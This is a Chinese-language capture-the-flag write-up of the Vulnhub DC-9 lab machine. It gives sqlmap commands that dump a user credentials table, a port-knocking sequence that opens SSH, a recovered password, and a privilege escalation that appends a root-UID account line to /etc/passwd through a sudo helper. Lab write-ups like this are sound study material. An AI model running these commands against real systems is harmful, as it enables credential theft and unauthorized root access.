Vulnhub靶机 DC-9

哇，开心了，DC系列最后一个，加油！

135是靶机
80 22端口
访问主页

bp抓了一下包，看着应该可以注入，跑一下sqlmap

列出了一堆账号密码

sqlmap -u "http://192.168.0.135/results.php" --data "search=1" --dbs
sqlmap -u "http://192.168.0.135/results.php" --data "search=1" -D users --tables
sqlmap -u "http://192.168.0.135/results.php" --data "search=1" -D users -T UserDetails --columns
sqlmap -u "http://192.168.0.135/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump

另外一个库，发现admin

登录一下
File does not exist
可能是LFI漏洞

真的是
ssh不能利用
端口敲门
端口敲门服务，即：knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，使系统开启需要访问的服务端口，才能对外访问。不使用时，再使用自定义的序列号来“关门”，将端口关闭，不对外监听。进一步提升了服务和系统的安全性。

7469，8475，9842

nmap是有顺序的
显示7469，然后8475，最后9842
要不然ssh端口还是关闭的

nmap -p 7469 192.168.0.135
nmap -p 8475 192.168.0.135
nmap -p 9842 192.168.0.135

试了一下admin，不能登录
换之前的另外一张表的账号

应该用hydra爆破的
但是不知道为啥我没跑出来
搜了一下别人的

账号：fredy
密码：B4-Tru3-001

登录进去查看
/opt/devstuff/dist/test/test
不需要密码

含义：3个参数，将第二个参数的文件内容增加在第三个参数文件里面。

先生成一个密码的hash值
将账号写入文件
运行test
切换账号
拿到flag！

echo 'lez:$1$lez$UZwzHnEcAuQQfGcnJQOJh/:0:0::/root:/bin/bash' >> /tmp/lez
sudo ./test /tmp/lez /etc/passwd

做的有点多了今天，有点累
做的越多就越发现
要学的东西越来越多
加油吧少年！